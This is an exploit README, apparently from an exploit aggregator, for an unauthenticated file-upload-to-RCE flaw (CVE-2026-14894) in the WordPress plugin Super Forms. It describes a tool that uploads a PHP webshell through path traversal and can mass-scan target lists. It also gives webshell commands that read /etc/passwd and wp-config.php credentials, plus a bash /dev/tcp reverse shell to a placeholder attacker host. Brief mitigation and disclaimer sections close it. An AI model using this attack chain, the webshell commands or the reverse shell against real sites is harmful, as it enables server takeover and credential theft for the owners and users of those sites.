Share
## https://sploitus.com/exploit?id=ED9BCDF7-AF28-577D-BF6D-43E2548BC780
# CVE-2026-14894 โ Super Forms โค 6.3.313
---
## Overview
**Unauthenticated Arbitrary File Upload โ Remote Code Execution** in the WordPress plugin [Super Forms](https://wordpress.org/plugins/super-forms/) versions **โค 6.3.313**.
The vulnerability resides in the AJAX handler `super_submit_form` which processes file uploads through a `datauristring` field without validating the file extension or MIME type before writing to disk. An unauthenticated attacker can upload a PHP webshell and achieve full Remote Code Execution on the target server.
---
## Vulnerability Details
| Field | Detail |
|--------------------|-----------------------------------------------------------------|
| **CVE ID** | CVE-2026-14894 |
| **Plugin** | Super Forms (WordPress) |
| **Affected** | โค 6.3.313 |
| **Patched** | 6.3.314 (forces `.pdf` extension + `realpath` containment) |
| **CVSS** | 9.8 Critical |
| **Auth Required** | None |
| **Researcher** | andrea bocchetti |
| **AJAX Action** | `super_submit_form` |
| **Sink** | `datauristring` field โ `class-ajax.php:2762โ2766` |
| **Upload Path** | `/wp-content/uploads/superforms/YYYY/MM//` |
---
## Attack Chain
```
[1] Mint nonce (nopriv)
POST /wp-admin/admin-ajax.php
action=super_create_nonce
โ
โผ
[2] Upload PHP shell via datauristring (unauthenticated)
POST /wp-admin/admin-ajax.php
action=super_submit_form
data={"sf_upload_field":{"files":[{"datauristring":"data:image/png;base64,..."}]}}
โ
โโโ Path Traversal โ /wp-content/themes//shell.php โ primary
โ (always exec)
โ
โโโ Random folder โ /wp-content/uploads/superforms/... โ fallback
(exec depends on server policy)
โ
โผ
[3] Shell Discovery
โโโ S0: media?parent=entry_id (WP REST)
โโโ S1: REST /wp/v2/media search (unauth)
โโโ S2: Apache/nginx directory listing
โโโ S3: WP sitemap attachment XML
โ
โผ
[4] RCE โ curl "http://target/wp-content/themes/theme/shell.php?c=id"
```
---
## Requirements
```bash
pip install requests urllib3
```
- Python 3.8+
- Network access to target WordPress site
---
## Usage
### Single Target
```
python cve-2026-14894.py
```
```
CVE-2026-14894 โ Super Forms โค 6.3.313
Unauthenticated File Upload โ Remote Code Execution
Researcher: andrea bocchetti | PoC: Beelze
1 Single target
2 Mass targets (file)
Mode (1/2): 1
Target URL : https://target.com
Form ID (enter=auto) : โ leave blank = auto-discover
Shell name (enter=random): โ leave blank = random name
Shell file (enter=built-in): โ leave blank = built-in shell
WP user (optional/REST) : โ optional, improves discovery
WP pass (optional/REST) : โ optional
```
**Expected output on success:**
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
TARGET https://target.com
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Super Forms v6.3.301 vulnerable โค6.3.313
[1/3] Mint nonce ...................... โ OK a3f9e1c... sid=sess_ab...
[2/3] Upload [xkqmhzjt.php] .......... โ OK form_id=42 entry_id=137
[3/3] Shell discovery ................ โ FOUND โ RCE [path traversal โ theme]
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ PWNED โ RCE CONFIRMED โ
โ โ
โ Shell ยป https://target.com/wp-content/themes/astra/shell โ
โ RCE ยป uid=33(www-data) gid=33(www-data) โ
โ โ
โ $ curl "https://target.com/...shell.php?c=whoami" โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
### Mass Scan
```
Mode (1/2): 2
Targets file : targets.txt โ one URL per line, # = comment
Form ID (enter=auto) :
Threads (enter=5) : 10
Shell file (enter=built-in):
WP user (optional/REST) :
WP pass (optional/REST) :
```
**targets.txt format:**
```
# Bug bounty scope
https://site1.com
https://site2.com
https://site3.com
```
**Mass scan output:**
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
MASS SCAN 3 targets threads=10
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[01/03] https://site1.com .... RCE uid=33(www-data)
โณ https://site1.com/wp-content/themes/astra/xkqmhzjt.php
[02/03] https://site2.com .... WRITE no exec
โณ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php
[03/03] https://site3.com .... FAIL plugin inactive / blocked
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
SUMMARY 1 RCE 1 WRITE_ONLY 0 MAYBE / 3 total
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
RCE SHELLS:
ยป https://site1.com/wp-content/themes/astra/xkqmhzjt.php (uid=33...)
```
---
## Custom Shell
You can supply your own shell file instead of the built-in webshell:
```
Shell file (enter=built-in): /path/to/myshell.php
```
The tool will upload your file and treat any `200` response with a non-empty body as RCE confirmation.
---
## Shell Interaction
After obtaining RCE, interact with the shell:
```bash
# Command execution
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id"
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd"
# Read WordPress config (creds, DB)
curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php"
# Reverse shell
curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'"
```
---
## Outputs
Results are automatically saved to:
```
~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json
```
---
## Status Codes
| Status | Meaning |
|-----------------|---------------------------------------------------------------------|
| `RCE` | PHP shell confirmed executing โ full remote code execution |
| `WRITE_ONLY` | File written but PHP not executed (engine off / .htaccess deny) |
| `POSSIBLE_WRITE`| Upload returned success but shell URL could not be resolved |
| `FAIL` | Plugin inactive, nonce failed, or patched version detected |
---
## Mitigation
Update **Super Forms** to **โฅ 6.3.314**. The patch enforces `.pdf`-only extension in `datauristring` uploads and adds `realpath()` containment to prevent path traversal.
---
## Disclaimer
> This tool is intended for **authorized penetration testing**, **bug bounty research**, and **educational purposes only**.
> Do not use against systems you do not have explicit written permission to test.
> The author is not responsible for any misuse or damage caused by this tool.
---
CVE-2026-14894 ยท Super Forms โค 6.3.313 ยท Unauth File Upload RCE
Researcher: andrea bocchetti ยท PoC: Beelze